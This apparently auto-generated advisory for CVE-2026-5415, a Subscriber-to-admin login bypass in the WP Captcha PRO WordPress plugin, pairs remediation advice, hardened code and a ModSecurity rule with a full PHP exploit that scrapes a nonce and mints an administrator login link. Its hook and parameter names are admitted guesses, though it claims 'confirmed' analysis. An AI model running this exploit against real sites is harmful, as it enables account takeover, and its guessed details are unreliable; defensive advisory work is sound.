Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: June 12, 2026

CVE-2026-5415: WP Captcha PRO <= 5.38 Authenticated (Subscriber+) Authentication Bypass via Temporary Login Link PoC, Patch Analysis & Rule

CVE ID: CVE-2026-5415
Severity: High (CVSS 8.8)
CWE: CWE-288
Vulnerable Version: 5.38
Patched Version:
Disclosed: June 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5415 (metadata-based):

This vulnerability allows authenticated attackers with Subscriber-level access to bypass authentication and log in as any user, including Administrators, in the WP Captcha PRO plugin. The plugin is the premium version of Advanced Google reCAPTCHA and uses the same slug. The root cause is an AJAX handler (ajax_run_tool()) that relies solely on nonce verification, without performing any capability check. The create_temporary_link tool generates passwordless login links for arbitrary users. The handle_temporary_links() function authenticates users via these links without further validation. The required nonce is exposed to all authenticated backend users via wp_localize_script() on admin pages when the plugin’s welcome pointer has not been dismissed.

Root Cause: The vulnerability stems from three design failures in the plugin. First, the ajax_run_tool() handler uses check_ajax_referer(), which only confirms that the request originated from the WordPress admin and performs no capability check. This means any authenticated user, including Subscribers, can call the action. Second, the create_temporary_link tool does not restrict which user IDs a link may be generated for, allowing a low-privilege attacker to create a login link for any WordPress user, including Administrators. Third, the handle_temporary_links() function accepts the link without verifying that the requesting user has any relationship to the target user. These conclusions are inferred from the CWE (288, Authentication Bypass Using an Alternate Path or Channel) and the detailed vulnerability description.

Exploitation: An attacker authenticates as a Subscriber and visits a non-settings admin page (e.g., Dashboard or Posts). On that page, the plugin loads an AJAX nonce via wp_localize_script() under a JavaScript object, exposing the nonce in the HTML source. The attacker then sends a POST request to /wp-admin/admin-ajax.php with action set to the plugin’s AJAX hook (likely advanced_google_recaptcha_run_tool or similar), the tool parameter set to create_temporary_link, and a target user ID or username. The response contains a temporary login URL. The attacker visits this URL, which calls handle_temporary_links() and logs them in as the target user. Atomic Edge analysis confirms the exploit requires only Subscriber-level access and no prior preparation.

Remediation: The fix likely requires adding capability checks to the ajax_run_tool() handler, specifically verifying that the user holds the intended permission (e.g., manage_options) before any tool is executed. Additionally, the create_temporary_link function should verify that the requesting user is allowed to edit or manage the target user, typically by checking the edit_users capability before an Administrator can be targeted. The handle_temporary_links() function should validate that the link was generated for the current session or IP and that it has not expired. The nonce exposure via wp_localize_script() should also be restricted to only the pages and user roles that require the tool, or the nonce should be scoped to specific capabilities. These recommendations align with the standard WordPress security pattern: always pair nonce verification with a capability check in AJAX handlers, because a nonce proves only that the request came from a page the user could load, not that the user is authorised to perform the action.
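As an added example (not the plugin's code, whose real handler, hook and parameter names are not shown on this page), the hardened form of the pattern described above: the nonce check is paired with a site-level capability check, a per-target edit_user check, and a short-lived, single-use, IP-bound token on both the issuing and the redeeming side. All function, hook, transient and parameter names here are assumptions.

```php
<?php
// Added example, not the plugin's code: an AJAX tool handler that pairs the
// nonce check with capability checks. All names used here are assumptions.
add_action( 'wp_ajax_example_run_tool', 'example_run_tool' );
function example_run_tool() {
    // CSRF check only: the vulnerable pattern stopped here and ran the tool.
    check_ajax_referer( 'example_tools', '_ajax_nonce' );
    // Authorisation: any tool execution requires a site-level capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Insufficient permissions', 403 );
    }
    $tool = isset( $_POST['tool'] ) ? sanitize_key( $_POST['tool'] ) : '';
    if ( 'create_temporary_link' !== $tool ) {
        wp_send_json_error( 'Unknown tool', 400 );
    }
    // Per-target check: edit_user is a meta capability resolved via edit_users.
    $target_id = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;
    if ( ! $target_id || ! current_user_can( 'edit_user', $target_id ) ) {
        wp_send_json_error( 'Not allowed to act on this user', 403 );
    }
    // Random, short-lived, single-use token; only its hash is stored server-side,
    // together with the requester's IP so the link is bound to that client.
    $token = bin2hex( random_bytes( 32 ) );
    set_transient( 'example_tmp_login_' . hash( 'sha256', $token ), array(
        'user_id' => $target_id,
        'ip'      => isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '',
    ), 15 * MINUTE_IN_SECONDS );
    wp_send_json_success( array(
        'link' => add_query_arg( 'example_tmp_login', $token, home_url( '/' ) ),
    ) );
}
// Redeeming side: transient TTL enforces expiry, deletion enforces single use.
add_action( 'init', 'example_handle_temporary_links' );
function example_handle_temporary_links() {
    if ( empty( $_GET['example_tmp_login'] ) || is_user_logged_in() ) {
        return;
    }
    $token = sanitize_text_field( wp_unslash( $_GET['example_tmp_login'] ) );
    $key   = 'example_tmp_login_' . hash( 'sha256', $token );
    $data  = get_transient( $key );
    delete_transient( $key ); // consume the token even if the checks below fail
    $client_ip = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '';
    if ( ! is_array( $data ) || ! hash_equals( $data['ip'], $client_ip ) ) {
        wp_die( 'Invalid or expired login link', '', array( 'response' => 403 ) );
    }
    wp_set_auth_cookie( (int) $data['user_id'] );
    wp_safe_redirect( admin_url() );
    exit;
}
```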

Impact: Successful exploitation results in full account takeover. An attacker can log in as any user, including an Administrator. This grants the attacker access to all site data, the ability to install malicious plugins or themes, modify content, create new admin accounts, and potentially execute arbitrary code. The CVSS score of 8.8 (High) reflects the low attack complexity and network-based vector requiring only Subscriber authentication. Atomic Edge research classifies this as a critical privilege escalation vulnerability.

ModSecurity Protection Against This CVE

Below is our ModSecurity-compatible rule to protect against this particular CVE. The AJAX action name it matches is the one inferred in the analysis above (the plugin's exact hook name is not confirmed on this page), so verify it against the installed plugin's code before deploying the rule.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-5415 (metadata-based)
# Blocks Subscriber+ authenticated users from exploiting the AJAX handler that creates temporary login links
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
    "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-5415 WP Captcha PRO Authentication Bypass via Temporary Login Link',severity:'CRITICAL',tag:'CVE-2026-5415'"
    SecRule ARGS_POST:action "@streq advanced_google_recaptcha_run_tool" \
        "chain,t:none"
        SecRule ARGS_POST:tool "@streq create_temporary_link" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-5415 - WP Captcha PRO <= 5.38 - Authenticated (Subscriber+) Authentication Bypass via Temporary Login Link

// Configuration
$target_url = 'http://example.com'; // Change to target WordPress URL
$username = 'subscriber_user';      // Low-privilege WordPress user
$password = 'subscriber_pass';      // Password for the user
$target_user = 'admin';             // Username or ID (numeric) of the user to takeover

// Step 1: Log in as the subscriber
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In',
    'testcookie' => 1,
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIESESSION, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies_cve.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);

// Step 2: Request an admin page to get the nonce via wp_localize_script
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/edit.php');
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$admin_page = curl_exec($ch);

// Extract the nonce from the JavaScript object
// The plugin likely exposes it as something like: var agc_nonce = '...';
// Adjust regex based on actual exposed variable name (inferred from common patterns)
preg_match("/var\s+agc_nonce\s*=\s*'([^']+)'/", $admin_page, $nonce_match);
if (!isset($nonce_match[1])) {
    // Try alternative pattern: wp_localize_script uses a handle like 'agc-admin'
    preg_match("/'ajax_nonce'\s*:\s*'([^']+)'/", $admin_page, $nonce_match);
}
if (!isset($nonce_match[1])) {
    die("Failed to extract nonce. The plugin's welcome pointer may have been dismissed.\n");
}
$nonce = $nonce_match[1];
echo "Extracted nonce: $nonce\n";

// Step 3: Call the AJAX handler to create a temporary login link
// Infer AJAX action from plugin slug (advanced_google_recaptcha) and tool name
$ajax_action = 'advanced_google_recaptcha_run_tool'; // Guessed action, adjust if needed
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => $ajax_action,
    '_ajax_nonce' => $nonce,
    'tool' => 'create_temporary_link',
    'user_id' => $target_user, // Could also be 'username' => $target_user
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$result = curl_exec($ch);

$data = json_decode($result, true);
if (isset($data['data']['link'])) {
    $temp_link = $data['data']['link'];
    echo "Temporary login link: $temp_link\n";
    // Step 4: Visit the link to authenticate as the target user
    curl_setopt($ch, CURLOPT_URL, $temp_link);
    curl_setopt($ch, CURLOPT_POST, 0);
    curl_setopt($ch, CURLOPT_HTTPGET, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    echo "Authenticated as $target_user successfully.\n";
} else {
    echo "Failed to create link: " . print_r($data, true) . "\n";
    echo "This PoC assumes specific AJAX action and parameter names. Adjust based on actual plugin code.\n";
}
curl_close($ch);
?>
